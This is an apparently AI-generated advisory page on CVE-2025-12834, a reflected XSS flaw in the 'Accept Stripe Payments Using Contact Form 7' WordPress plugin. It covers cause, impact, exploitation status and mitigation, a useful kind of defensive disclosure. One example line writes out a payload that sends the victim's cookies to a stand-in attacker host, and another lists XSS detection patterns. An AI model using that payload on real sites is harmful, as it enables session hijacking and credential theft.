
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-12834 is a Reflected Cross-Site Scripting (XSS) vulnerability in the "Accept Stripe Payments Using Contact Form 7" WordPress plugin, affecting versions up to and including 3.1. The flaw exists in the failure_message parameter due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject arbitrary web scripts. It was published on December 12, 2025, with Wordfence credited as the assigner. The vulnerability carries a CVSS v3.1 base score of 6.1 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), stemming from the plugin's failure to sanitize user-supplied input in the failure_message parameter before reflecting it in the page output. The vulnerable code is located in inc/lib/class.cf7sa.lib.php at line 696 of the plugin's version 3.1 source (EUVD). Exploitation requires no authentication or special privileges, but does require user interaction — specifically, a victim must be tricked into clicking a crafted link containing the malicious payload. The attack vector is network-based with low complexity (CAPEC-591: Reflected XSS) (Wordfence).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session on the affected WordPress site. This can result in session cookie theft, credential harvesting, defacement of page content as seen by the victim, or redirection to malicious sites. The CVSS scope is marked as "Changed," indicating the impact crosses the security boundary of the vulnerable component, with low confidentiality and integrity impacts and no availability impact (Wordfence, Red Hat CVE).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-12834 as of the available data. The EPSS score is approximately 0.074%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified (Wordfence).
failure_message parameter (e.g., https://target-site.com/[payment-page]?failure_message=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).failure_message value is reflected in the HTML output and the injected script executes in the victim's browser, enabling session hijacking, credential theft, or further malicious actions (Wordfence, Plugin Source).failure_message parameter (e.g., failure_message=%3Cscript%3E...%3C%2Fscript%3E).<script>, onerror=, javascript:, etc.) in the failure_message query parameter.WordPress site administrators should update the "Accept Stripe Payments Using Contact Form 7" plugin to a version beyond 3.1 that includes proper input sanitization and output escaping for the failure_message parameter. If no patched version is yet available, consider temporarily disabling the plugin or restricting access to the payment form pages until a fix is released. Additionally, deploying a Web Application Firewall (WAF) with XSS filtering rules can help mitigate exploitation attempts in the interim (Wordfence).
Wordfence included CVE-2025-12834 in their weekly WordPress vulnerability report for December 8–14, 2025, as part of routine disclosure coverage. No significant independent researcher commentary, vendor statements beyond the initial disclosure, or notable media coverage has been identified for this vulnerability (Wordfence Weekly Report).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."